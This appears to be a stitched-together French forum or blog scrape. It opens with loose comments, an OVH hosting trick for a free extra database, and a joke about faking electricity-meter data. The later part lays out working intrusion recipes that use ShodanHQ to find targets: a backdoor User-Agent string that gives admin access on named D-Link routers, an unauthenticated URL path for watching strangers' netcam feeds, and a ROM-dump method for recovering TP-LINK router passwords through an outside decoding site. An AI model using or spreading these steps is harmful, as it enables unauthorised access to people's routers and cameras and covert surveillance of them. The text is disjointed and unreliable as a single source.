Cool, à tester au boulot ^^
Roooh ça va je déconne !
Tout est dans le titre... C'est bien foutu.
Si vous possédez un hébergement mutualisé chez OVH en offre perso', voici une petite astuce qui vous permet d'obtenir l'accès à une base de données supplémentaire gratuitement.
ATTENTION, FAITE VITE CAR VISIBLEMENT CE N'EST PLUS POSSIBLE AVEC LA NOUVELLE INTERFACE D'ADMINISTRATION D'OVH. VOUS N'AVEZ PLUS QUE QUELQUES SEMAINES.
ps : j'ai rédiger ce tuto un peu à l'arrache donc désoler si j'ai oublier des trucs. Mais vu que le temps presse j'ai fait au plus vite. J'utilise cette astuce depuis le début, je suis trop con, j'aurais dû partager ça avant >< (même si je me doute que je suis pas le premier à l'avoir découvert xD)
Nan mais faut pas le voir comme ça les gars. Une fois que ça auras bien été audité par les hackers, non seulement on pourras contrôler cette petite boite et envoyer de fausses données, mais en plus on pourras aussi réduire notre facture d'électricité en faisant croire que chez nous, dans 150m², on à que 2 ampoules basses consommations et un réfrigérateur. Cool ou pas ? ^^
En plus qui sais, peut-être qu'ils s'en serviront pour savoir qui à une télé et doit donc payé la redevance...
Ouh putain, ça pique. On ne peut pas savoir qui est le telecom français en question ? :)
Je me met ça de côté, il n'est pas à exclure que je pourrais en avoir besoin un de ces jours...
Cette carte est compatible avec les outils BackTrack (comprenez avant tout aircrack et compagnie).
Elle à de plus une portée assez bluffante, apparemment !
routeurs concernés :
DIR-100
DI-524
DI-524UP
DI-604S
DI-604UP
DI-604+
TM-G5240
BRL-04UR
BRL-04CW
rechercher sur ShodanHQ
installer User Agent Switcher sur Firefox (https://addons.mozilla.org/fr/firefox/addon/user-agent-switcher/)
changer son User Agent en xmlset_roodkcableoj28840ybtide
voila, le routeur ne vous demanderas pas de vous authentifier ! Vous serez admin direct
Recherche "netcam" sur ShodanHQ
Rajouter /anony/mjpg.cgi à l'ip
se rendre sur http://xxx.xxx.xxx.xxx/anony/mjpg.cgi
Voila, la "vidéo" s'affiche
sur ShodanHQ, rechercher "TD-W8951ND"
se rendre à la page xxx.xxx.xxx.xxx/rpFWUpload.html
faire une sauvegarde de la ROM
montrer la ROM à http://50.57.229.26/zynos.php (module "ZynOS (Huawei) Configuration Decompressor" - routerpwn)
on obtient :
xxxxxxxx <---- mot de passe en clair
TP-LINK
public
public
public
Node5
xxxxxxxx@callu
dhcppc
on retourne sur xxx.xxx.xxx.xxx/ puis
•login : admin
•password : xxxxxxxx